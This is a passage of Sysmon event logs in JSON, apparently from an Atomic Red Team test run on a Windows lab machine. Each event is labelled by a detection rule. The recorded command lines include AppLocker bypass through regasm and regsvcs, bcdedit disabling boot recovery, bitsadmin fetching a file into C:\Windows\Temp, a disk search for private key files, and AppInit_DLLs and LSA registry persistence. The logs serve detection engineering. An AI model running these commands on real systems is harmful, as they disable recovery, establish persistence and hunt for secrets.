(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ProcessId":5800,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:55.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3613,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:55.681219Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ParentProcessId":5800,"ProcessGuid":"747F3D96-D7A3-5D31-0000-0010D2B42900","ProcessId":6176,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:55.694"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3614,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:55.699293Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe\" T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7BB-5D31-0000-0010D5092A00","ProcessId":1060,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:46:19.479"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3619,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:46:19.484316Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence or CredAccess - Lsa NotificationPackge","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Notification Packages","UtcTime":"2019-07-19 14:47:21.917"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3632,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:21.972037Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["New DLL Added to AppInit_DLLs Registry Key"],"event":{"Event":{"EventData":{"Details":"C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D809-5D31-0000-00105C262B00","ProcessId":6056,"RuleName":"Persistence - AppInit","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs","UtcTime":"2019-07-19 14:47:37.136"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3635,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:37.147054Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"EventData":{"CommandLine":"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001064AD2B00","ParentProcessId":6508,"ProcessGuid":"747F3D96-D817-5D31-0000-001097B02B00","ProcessId":396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:47:51.844"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3648,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:51.865963Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"EventData":{"CommandLine":"bcdedit.exe /set {default} recoveryenabled no","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} recoveryenabled no\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001049B42B00","ParentProcessId":6216,"ProcessGuid":"747F3D96-D817-5D31-0000-0010B7B62B00","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:47:51.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3650,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:52.010791Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D824-5D31-0000-001023F42B00","ParentProcessId":6736,"ProcessGuid":"747F3D96-D824-5D31-0000-001075F62B00","ProcessId":1540,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:04.122"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3655,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:04.131410Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D83E-5D31-0000-0010A2D72E00","ParentProcessId":4036,"ProcessGuid":"747F3D96-D83E-5D31-0000-0010AAD92E00","ProcessId":3732,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:30.796"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3660,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:30.807486Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ProcessId":888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3677,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.524876Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c:\\ /b /s .key \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-001045922F00","ProcessId":6220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3678,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.557947Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"findstr /e .key","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Find String (QGREP) Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=393F2422D22079BFB0022598D70BEB294F2024F4,MD5=DC0816790EFA08AA5B55C1EECFDDB525,SHA256=750AB5E1F3EB18CC42A4A4C7BAB27753F6B26FB9752AD3861833753091044281,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F","Image":"C:\\Windows\\System32\\findstr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-00109E932F00","ProcessId":948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3679,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.570057Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E83B3100","ParentProcessId":2888,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010413E3100","ProcessId":5348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.176"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3682,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.180586Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3683,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.227372Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ParentProcessId":5984,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010CC423100","ProcessId":5256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3684,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.249442Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ProcessId":5016,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.284"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3685,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.304938Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 